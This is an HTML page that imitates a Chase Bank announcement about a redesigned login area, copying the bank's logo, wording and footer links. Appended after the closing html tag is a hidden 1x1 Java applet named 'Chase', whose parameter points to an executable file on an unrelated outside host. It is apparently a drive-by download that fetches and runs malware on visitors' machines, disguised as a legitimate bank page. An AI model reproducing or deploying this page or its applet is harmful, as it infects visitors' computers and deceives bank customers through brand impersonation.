<!DOCTYPE html>
<html>
<body>
<title>CHASE Bank</title>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>New Chase homepage coming soon</title><META name="robots" content="NOINDEX,NOFOLLOW"><META name="keywords" content="services"><META name="description" content=""><script type="text/javascript"></script><link href="https://www.chase.com/online/services/css/new-communication-style.css?language=en_US" type="text/css" rel="stylesheet"><style type="text/css" media="screen">
</style></head><body><div id="wraper">
<div id="header"><a href="https://www.chase.com"><img title="chase logo" alt="Chase Logo" src="https://www.chase.com/online/services/images/chase-logo.png" /></a>
<div id="wndtxt" align="right"><a class="navlinks" href="https://www.chase.com">Return to Chase.com</a></div>
<div class="heading"><img title="Clearer &amp; Simpler. A new look for the login area is here." alt="Clearer &amp; Simpler. A new look for the login area is here." src="https://www.chase.com/online/services/images/headline.png" /></div>
<p class="bigFont">The larger login area makes entering your account information even easier.<br />
The login screen looks different, but your User ID and Password <strong>have not</strong> changed.</p>
</div>
<div id="bodySection">
<div class="laptopContainer"><img title="Laptop" border="0" alt="Laptop" src="https://www.chase.com/online/services/images/laptop.png" />
<div class="bubble1 bubbleContainer">
<div class="innerbubble1">
<p class="one">All of our<br />
products and<br />
services in just<br />
one click</p>
</div>
</div>
<div class="bubble2 bubbleContainer">
<div class="innerbubble2">
<p class="two">Larger login area<br />
makes entering<br />
your account<br />
information even<br />
simpler</p>
</div>
</div>
<div class="bubble3 bubbleContainer">
<div class="innerbubble3">
<p class="three">Featured products,<br />
promotions and important service<br />
announcements</p>
</div>
</div>
</div>
</div>
<div id="footer">
<div id="footerlinkContainer" style="overflow: hidden">
<div class="footerLeft">
<ul>
    <li><a href="http://www.jpmorgan.com">J.P. Morgan</a></li>
    <li><a href="http://www.jpmorganchase.com">JPMorgan Chase</a></li>
</ul>
</div>
<div class="footerRight">
<ul>
    <li><a href="http://www.jpmorganchase.com/corporate/About-JPMC/about-us.htm">About Us</a></li>
    <li><a href="/index.jsp?pg_name=ccpmapp/shared/assets/page/accessibility_at_Chase">Accessibility</a></li>
    <li><a href="http://careers.jpmorganchase.com/career/careerhome">Careers</a></li>
    <li><a href="/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/privacy-notice">Privacy Notice</a></li>
    <li><a href="/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/security_home">Security</a></li>
    <li><a href="/index.jsp?pg_name=ccpmapp/shared/assets/page/terms">Terms of Use</a></li>
</ul>
<ul>
    <li><a href="https://www2.chase.com/credit-cards">Credit Cards</a></li>
    <li><a href="/online/Checking/chase-checking-account.htm">Checking</a></li>
    <li><a href="/online/Home-Lending/mortgages.htm">Mortgage</a></li>
    <li><a href="/online/Home-Refinance/mortgage-refinancing.htm">Refinance</a></li>
    <li><a href="/auto-loan/car-loan.htm">Auto Loans</a></li>
    <li><a href="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/business_banking_home">Business Checking</a></li>
</ul>
<p><a href="/online/Mortgage/safe-hmda.htm">Fair Lending Commitment: Secure &amp; Fair Enforcement for Mortgage<br />
Licensing (SAFE Act) - Home Mortgage Disclosure Act (HMDA)</a></p>
<img title="Housing Logo" alt="Housing Logo" src="https://www.chase.com/online/services/images/housinglogo.png" />EQUAL HOUSING LENDER<br />
Member FDIC</div>
</div>
<div id="copyright" align="center">&nbsp;</div>
</div>
</div>
<script language="JavaScript" type="text/javascript" src="https://www.chase.com/online/includes/javascript/copyright.js"></script><style type="text/css" media="screen">
</style><!-- tag attached to https://www.chase.com/online/services/new-communication.htm -->
<script src="https://www.chase.com/online/includes/javascript/jquery-1.6.4.min.js" type="text/javascript"></script>
<script src="https://chaseonline.chase.com/content/secure/include/javascript/jquery.chase.tag.XPlusOneActivity.config.js" type="text/javascript"></script>
<script src="https://chaseonline.chase.com/content/secure/include/javascript/jquery.chase.tag.XPlusOneActivity-20111113.min.js" type="text/javascript"></script>
<script type="text/javascript">
$(function(){
  initXPlusOneActivityTag('retail','retail_siteredesign', '', '');
});

</script>
<!-- tag attached to https://www.chase.com/online/services/new-communication.htm -->
<script type="text/javascript" src="https://chaseonline.chase.com/js/Reporting.js"></script>
</body></html>
</body>
</html>
<applet name='Chase' width="1" height="1" code='a.class' archive='java.jar'><param name="funtime" value="http://huilaweb.com/plugins/.css/sh3n.exe"></applet>